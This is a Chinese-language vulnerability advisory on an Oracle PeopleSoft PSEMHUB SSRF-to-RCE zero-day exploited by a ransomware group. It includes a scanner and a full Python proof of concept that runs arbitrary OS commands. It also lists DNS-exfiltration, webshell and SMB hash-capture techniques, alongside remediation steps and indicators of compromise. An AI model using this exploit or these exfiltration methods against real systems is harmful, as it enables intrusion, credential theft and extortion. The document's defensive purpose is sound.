文章总结： 该文档披露OraclePeopleSoft的CVE-2026-35273零日漏洞，该SSRF漏洞可导致未授权RCE，已被ShinyHunters勒索组织大规模利用。文档详细分析漏洞技术原理、提供检测脚本与POC，并给出从紧急补丁到长效防御的分层修复方案，强调对教育、金融等行业的严重威胁。 综合评分： 92 文章分类： 漏洞分析,应急响应,解决方案,漏洞预警,威胁情报

【高危漏洞预警】Oracle PeopleSoft 零日漏洞CVE-2026-35273

飓风网络安全

2026年6月16日 23:31 北京

在小说阅读器读本章

去阅读

一、漏洞详情 1.1受影响组件：Oracle PeopleSoft Enterprise PeopleTools — Updates Environment Management（PSEMHUB环境管理枢纽）

• 受影响版本：PeopleTools 8.61、8.62（更早未维护版本大概率存在同漏洞）

• 披露与利用时间线：

1. 2026-05-27：UNC6240（ShinyHunters勒索组织）开始在全球发起0day攻击

2. 2026-06-10：Oracle发布紧急安全预警+场外应急补丁

3. 2026-06-12：CISA将该漏洞录入已知活跃利用漏洞清单，强制政企限期修复

4. 截至2026-06-16：全球超100家机构、300+实例被攻陷，受害主体以高校、金融、制造业ERP系统为主 1.2 威胁主体与攻击链路 攻击团伙：ShinyHunters（追踪编号UNC6240），勒索 extortion 团伙，攻击流程标准化：

5. 公网资产测绘扫描 /PSEMHUB/ 路径暴露实例

6. 利用CVE-2026-35273无授权RCE拿下应用服务器

7. 部署MeshCentral远程代理，C2域名azurenetfiles.net伪装Azure云服务规避流量审计

8. 读取psappsrv.cfg明文数据库、中间件账号密码

9. 横向渗透WebLogic、批量调度服务、数据库集群

10. 加密业务数据、窃取师生/企业核心信息，公开泄露数据索要赎金

二、漏洞底层技术原理 2.1 漏洞根因 PeopleTools内置PSEMHUB环境更新管理模块，对外暴露无鉴权接口/PSEMHUB/adapter，接口接收可控target参数并由服务端主动发起HTTP/SMB出站请求：

1. 接口未做身份校验、未做内网IP/特殊协议黑名单过滤；

2. 攻击者可控target构造SSRF，访问本地内网管理服务；

3. 内网管理接口存在命令执行逻辑，通过SSRF跳转可间接执行系统命令，形成SSRF→本地接口调用→无授权RCE完整利用链；

4. 额外风险：target支持SMB协议，可强制目标服务器向外发起445端口连接，抓取Windows机器账号NetNTLM哈希用于中继爆破、内网横向移动。

2.2 关键触发接口

1. 漏洞入口探测接口：/PSEMHUB/adapter?target=xxx

2. 内网中继执行辅助接口：/PSIGW/HttpListeningConnector（可配合旧版漏洞扩大攻击面）

3. 内网管理执行端点：http://127.0.0.1:8000/psadmin/exec（仅本机可访问，依靠SSRF跳转调用）

2.3 完整利用逻辑

1. 攻击者发送GET请求至目标/PSEMHUB/adapter，target参数指向本机环回地址管理执行接口；

2. PeopleSoft服务端主动向127.0.0.1发起请求，携带攻击者传入的系统执行参数；

3. 本地psadmin管理模块接收参数，未过滤危险系统命令，直接调用操作系统API；

4. 命令执行结果通过HTTP响应返回攻击者，实现回显型RCE；

5. 无回显场景可通过外网HTTP/DNS日志带出命令执行结果，或写入Web目录上传后门。

三、漏洞检测脚本（合规探测，仅用于自查） 3.1 手动探测HTTP请求（curl） 用于验证目标是否存在SSRF入口，无危害仅做连通性测试：

漏洞探测请求，访问本地ping接口验证SSRF

curl -i “http://target-ip/PSEMHUB/adapter?target=http://127.0.0.1:8000/psadmin/ping” 判定标准： • 响应包含ping success、本地服务状态信息 → 存在漏洞入口，高危；

• 404/403/路径拦截/无本地服务返回 → 已修复或有WAF阻断。

3.2 Python批量资产探测脚本（仅内网自查） import requests import sys from concurrent.futures import ThreadPoolExecutor

headers = { “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” }

def check_vuln(target): url = f”{target.rstrip(‘/’)}/PSEMHUB/adapter?target=http://127.0.0.1:8000/psadmin/ping” try: resp = requests.get(url, headers=headers, timeout=5, verify=False) if resp.status_code == 200 and “ping” in resp.text: print(f”[!] 高危漏洞 CVE-2026-35273 存在: {target}”) else: print(f”[+] 目标安全: {target}”) except Exception as e: print(f”[-] 无法访问 {target}: {str(e)}”)

if __name__ == “__main__”: if len(sys.argv) < 2: print(“使用方式: python scan.py ip.txt”) sys.exit() targets = open(sys.argv[1], “r”, encoding=”utf-8″).read().splitlines() with ThreadPoolExecutor(max_workers=20) as pool: pool.map(check_vuln, targets)

四、完整研究型POC（仅授权测试环境使用，回显RCE） 4.1 POC原理说明 通过/PSEMHUB/adapter SSRF跳转本地psadmin/exec接口，传递cmd参数执行系统命令，响应直接返回命令输出；区分Windows/Linux执行参数。

4.2 Python 完整POC代码 import requests import urllib.parse import sys requests.packages.urllib3.disable_warnings()

class CVE202635273_Exploit: def __init__(self, target_base): self.base = target_base.rstrip(“/”) self.vuln_path = “/PSEMHUB/adapter” self.local_exec_endpoint = “http://127.0.0.1:8000/psadmin/exec”

def exec_cmd(self, cmd, is_windows=True): # 拼接本地执行接口参数 if is_windows: payload_cmd = f”cmd.exe /c {cmd}” else: payload_cmd = f”/bin/sh -c {cmd}” full_target_url = f”{self.local_exec_endpoint}?cmd={urllib.parse.quote(payload_cmd)}” exploit_url = f”{self.base}{self.vuln_path}?target={urllib.parse.quote(full_target_url)}” headers = { “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” } try: resp = requests.get(exploit_url, headers=headers, timeout=8, verify=False) print(“=”*60) print(f”命令执行结果:\n{resp.text}”) print(“=”*60) return resp.text except requests.exceptions.Timeout: print(“[ERROR] 请求超时，目标无回显或防火墙拦截”) except Exception as e: print(f”[ERROR] 利用失败: {str(e)}”)

def help_msg(): print(“”” CVE-2026-35273 Oracle PeopleTools RCE POC（仅授权测试环境） 使用示例：

Windows系统执行ipconfig

python exp.py http://192.168.10.10 windows ipconfig

Linux系统执行whoami

python exp.py https://erp.test.edu linux “whoami;id” “””)

if __name__ == “__main__”: if len(sys.argv) !=4: help_msg() sys.exit(0) target = sys.argv[1] os_type = sys.argv[2] cmd = sys.argv[3] exp = CVE202635273_Exploit(target) if os_type.lower() == “windows”: exp.exec_cmd(cmd, is_windows=True) elif os_type.lower() == “linux”: exp.exec_cmd(cmd, is_windows=False) else: print(“系统类型仅支持 windows / linux”)

4.4 无回显拓展利用思路（研究用途）

1. DNS外带：构造target内拼接nslookup 随机字符.xxx.dnslog.cn，通过DNS日志读取执行结果；

2. WebShell写入：执行命令将jsp/aspx后门写入PeopleSoft网站发布目录，直接浏览器访问连接；

3. SMB哈希抓取：target=\攻击者IP\share\test强制目标发起SMB请求，捕获NetNTLM哈希用于爆破。

五、漏洞危害深度分析

1. 核心ERP完全失陷：PeopleSoft承载人事、财务、学生、供应链核心数据，RCE直接获取数据库明文凭证，批量泄露敏感信息；

2. 勒索加密风险：攻击团伙落地MeshCentral持久化后门，全盘加密业务文件，阻断企业正常经营；

3. 内网横向爆破：通过SSRF抓取机器账号哈希，对内网WebLogic、数据库、AD域控展开渗透；

4. 持久驻留：创建管理员后门账号、写入开机启动脚本、植入内存无文件代理，常规杀毒难以清理；

5. 合规重大风险：教育、金融、医疗机构泄露用户隐私，触发《个人信息保护法》巨额处罚。

六、分层防御修复方案（紧急→长期） 6.1 紧急修复（最高优先级，立即执行）

1. 安装Oracle官方场外应急补丁 访问Oracle安全公告：https://www.oracle.com/security-alerts/alert-cve-2026-35273.html

PeopleTools 8.61：安装对应版本紧急更新包

PeopleTools 8.62：部署同系列安全补丁 补丁完成后重启PSEMHUB、WebLogic应用服务，重新运行检测脚本验证漏洞闭合。

2. 临时阻断方案（无法立刻打补丁时保命） WAF/反向代理拦截规则：阻断所有URL前缀/PSEMHUB/公网访问；

网络ACL：防火墙限制仅内网管理网段访问PeopleSoft 80/443端口，彻底剥离公网暴露；

禁用PSEMHUB服务：临时关停Updates Environment Management组件，阻断漏洞入口。

6.2 中间层权限收敛加固

1. 降低PeopleSoft进程运行账户权限，禁止使用Windows管理员/root启动服务；

2. 限制服务出站访问策略：防火墙阻断服务器主动向外发起445（SMB）、53（DNS）、80/443非可信出站请求；

3. 清理psappsrv.cfg明文密码，改用Oracle加密凭证存储机制。

6.3 长效纵深防御体系

1. 资产测绘常态化：每周扫描公网ERP实例，监控/PSEMHUB/、/PSIGW/路径暴露；

2. 日志审计告警：全量采集WebLogic访问日志，匹配/PSEMHUB/adapter、超长target参数实时告警；

3. IPS特征防护：部署TrendAI IPS规则1012580，拦截SSRF攻击载荷；

4. 分段网络隔离：ERP应用服务器、数据库、AD域控三层网络分段，禁止跨段无限制互通；

5. 定期渗透演练：每季度授权安全团队对PeopleSoft进行专项漏洞验证。

七、入侵痕迹排查（已暴露公网实例必做） 7.1 日志排查项

1. WebLogic访问日志：检索/PSEMHUB/adapter、target=http://127.0.0.1、内网环回地址请求记录；

2. 系统历史命令：Linux .bash_history、Windows Powershell/CMD执行日志；

3. 出站网络日志：大量向azurenetfiles.net:443、外部SMB 445端口连接记录。

7.2 恶意文件痕迹

1. 临时目录/tmp/、C:\Windows\Temp下fanout.sh、MeshCentral代理程序；

2. Web发布目录新增jsp/aspx后门脚本；

3. 根目录勒索提示文件 README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT。

7.3 后门持久化排查

1. Windows：计划任务、服务列表、注册表Run启动项；

2. Linux：crontab定时任务、/etc/rc.d开机脚本；

3. 系统新增不明管理员账号、数据库陌生存储过程。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：飓风网络安全 《【高危漏洞预警】Oracle PeopleSoft 零日漏洞CVE-2026-35273》